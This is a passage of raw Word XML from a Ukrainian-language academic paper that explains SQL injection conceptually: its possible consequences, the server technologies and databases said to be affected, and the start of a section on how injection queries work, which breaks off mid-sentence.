        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EDA36B0" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">На основі використання додатку та способу обробки даних, що надаються користувачеві, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> може бути використана для реалізації атак згаданих</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>нище:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6470BF6C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – використовуючи цю атаку, атакуючий входить в додаток не надаючи дійсного ім'я користувача та пароля і отримує привілеї адміністратора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C88FF" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disclosure</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – використовуючи цю атаку, атакуючий отримує конфіденційну інформацію, що зберігається в базі даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D074A7" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compromised</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – атакуючий використовує цю атаку для спотворення веб-сторінки, вставляючи шкідливий вміст у веб-сторінку, або змінює вміст бази даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72181896" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compromised</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>availability</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – атакуючий використовує цю атаку для видалення інформації з бази даних, видалення логів, або аудиту інформації, що зберігається в базі даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21741E3E" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - це допомагає зловмисникові поставити під загрозу ОС хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB8EBCA" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00846B4C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc516752127"/>
      <w:bookmarkStart w:id="45" w:name="_Toc30433111"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Серверні технології які вразливі до SQL-ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="173A983A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00080601" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEE95A7" w14:textId="7C410EF6" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00080601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>side</w:t>
      </w:r>
      <w:r w:rsidRPr="00080601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>technology</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – потужна серверна технологія як ASP.NET і бази даних серверів дозволяють розробникам створювати динамічні сайти неймовірно легко.[1</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0046F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – потужна ASP.NET і SQL вразливість може легко бути експлуатована хакером використовуючи SQL-ін’єкцію.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6C4DC" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Susceptible</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>databases</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>– всі реляційні бази даних, SQLServer, Oracle, IBMDB2, і MySQL, є вразливими до SQL-ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1AD7AE" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – SQL-ін’єкційна атака не використовує вразливість програмного забезпечення, замість того вона націлена на веб-сайт, які не слідують безпечній процедурі кодування для доступу і маніпулювання даними, що зберігаються в реляційній базі даних</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D10B0C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Серверні технології реалізовують бізнес логіку на стороні сервера, які потім служать вхідними запитами від клієнта. Серверні технології дають плавний доступ, забезпечують, зберігають і відновлюють інформацію. Різноманітні серверні технології включають ASP, ASP.NET, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ColdFusion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, JPS, PHP, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, і </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ruby</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rails</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, і т.д. Деякі з цих технологій схильні до SQL-ін’єкцій, і додатки розроблені використовуючи ці технології вразливі до SQL-ін’єкцій. Веб додатки використовують різноманітні технології баз даних як частину їх функціональності. Деякі реляційні бази даних використовуються для розробки веб додатків включаючи </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IBMDB</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2, і </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Розробники інколи несвідомо нехтують безпечною процедурою кодування коли використовують ці технології, котрі роблять додаток вразливим до SQL-ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA1A738" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409903B5" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00846B4C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc516752128"/>
      <w:bookmarkStart w:id="47" w:name="_Toc30433112"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.3 Розуміння запиту SQL-ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="493013F7" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547AC312" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Запит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> використовує нормальне виконання SQL. Атакуючий подає запит зі значеннями, що виконаються нормально але повернуть дані з бази даних, які потрібні атакуючому. Атакуючий здатний увести зловмисні значення тому що додаток нездатний відфільтрувати їх перед обробкою.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049A694D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В HTML формі, що отримує і передає опубліковану інформацію, розміщену користувачем </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
